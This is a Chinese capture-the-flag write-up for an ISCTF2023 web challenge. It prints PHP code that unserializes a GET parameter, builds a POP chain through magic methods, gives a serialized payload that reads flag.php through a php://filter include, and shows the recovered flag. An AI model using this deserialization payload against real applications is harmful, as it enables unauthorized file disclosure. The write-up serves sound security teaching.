标签:__ ISCTF2023 Saber 题解 class release echo 部分 public
WEB:
圣杯战争 !!! (题解:结局别说遗憾 Zn. )
解题思路:打开题目链接,代码如下:
<?php
highlight_file(__FILE__);
error_reporting(0);
class artifact{
public $excalibuer;
public $arrow;
public function __toString(){
echo "为Saber选择了对的武器!<br>";
return $this->excalibuer->arrow;
}
}
class prepare{
public $release;
public function __get($key){
$functioin = $this->release;
echo "蓄力!咖喱棒!!<br>";
return $functioin();
}
}
class saber{
public $weapon;
public function __invoke(){
echo "胜利!<br>";
include($this->weapon);
}
}
class summon{
public $Saber;
public $Rider;
public function __wakeup(){
echo "开始召唤从者!<br>";
echo $this->Saber;
}
}
if(isset($_GET['payload'])){
unserialize($_GET['payload']);
}
?>
从代码中可以看出这题再考 PHP 反序列的 POP 链的构造,并且它的这四个魔术方法的触发顺序为:
1. __wakeup() 对对象反序列化自动触发
2. __toString() 对象被当作字符串自动触发
3. __get($key) 访问 prepare 不存在的属性被调用
4. __invoke() saber 被实列被作为函数调用
开始构造 POP 链:
<?php
highlight_file(__FILE__);
error_reporting(0);
class artifact{
public $excalibuer;
public $arrow;
public function __construct()
{
$this->excalibuer= new prepare();
}
}
class prepare{
public $release;
}
class saber{
public $weapon='php://filter/convert.base64-encode/resource=flag.php'; //指
定过滤方式,访问flag.php
}
class summon{
public $Saber;
public $Rider;
}
$a = new summon();
$a->Saber =new artifact();
$a->Saber->excalibuer->release=new saber();
echo urldecode(serialize($a));
?>
运行一下即可得到反序列化 POP 链:
O:6:"summon":2:{s:5:"Saber";O:8:"artifact":2:{s:10:"excalibuer";O:7:"prepare":1:
{s:7:"release";O:5:"saber":1:{s:6:"weapon";s:52:"php://filter/convert.base64-
encode/resource=flag.php";}}s:5:"arrow";N;}s:5:"Rider";N;}
用 HackBar 传入 get 参数,即可在页面中得到:
对得到的字符串 base64 解密一下得到 flag :
ISCTF{9b2fef42-d7ea-4ce0-8d17-388a15e46949}
标签:__,
ISCTF2023,
Saber,
题解,
class,
release,
echo,
部分,
public
From: https://www.cnblogs.com/IWaits/p/17922145.html